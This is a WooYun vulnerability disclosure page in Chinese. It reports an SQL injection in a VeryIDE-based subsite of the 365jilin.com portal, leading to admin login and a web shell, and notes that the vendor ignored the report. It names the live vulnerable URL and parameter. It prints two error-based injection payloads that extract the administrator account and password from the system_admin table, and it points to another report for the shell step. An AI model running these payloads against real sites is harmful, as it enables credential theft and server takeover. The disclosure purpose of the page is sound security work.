当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:
漏洞标题:
吉和网分站sql注入漏洞getshell
相关厂商:
漏洞作者:
提交时间:
2014-10-30 10:39
修复时间:
2014-12-14 10:40
公开时间:
2014-12-14 10:40
漏洞类型:
SQL注射漏洞
危害等级:
自评Rank:
5
漏洞状态:
未联系到厂商或者厂商积极忽略
漏洞来源:
http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签:
分享漏洞:
4人收藏 收藏
分享漏洞:

>

漏洞详情

披露状态:

2014-10-30: 积极联系厂商并且等待厂商认领中,细节不对外公开
2014-12-14: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

吉和网分站sql漏洞 getshell

详细说明:

http://zt.365jilin.com veryIDE
sql:http://zt.365jilin.com/module/form/content/?id=190

1.jpg


2.jpg


漏洞证明:

乌云有payload
具体语句自己构造
查询账号

3.jpg


qqq',(select (1) from information_schema.tables where 1=1 aNd (SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(substring((select account from system_admin where id=1),1,62)))a from information_schema.tables group by a)b)),0,1370615079,1)#


查询密码

4.jpg


qqq',(select (1) from information_schema.tables where 1=1 aNd (SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(substring((select password from system_admin where id=1),1,62)))a from information_schema.tables group by a)b)),0,1370615079,1)#


登录后台

5.jpg


getshell 方法参照此 WooYun: VeryIDE互动营销平台一系列问题,N多门户、地方网站中招

修复方案:

升级veryIDE到最新版本 or 你们自己修复

版权声明:转载请注明来源 Mr Grey@乌云


>

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝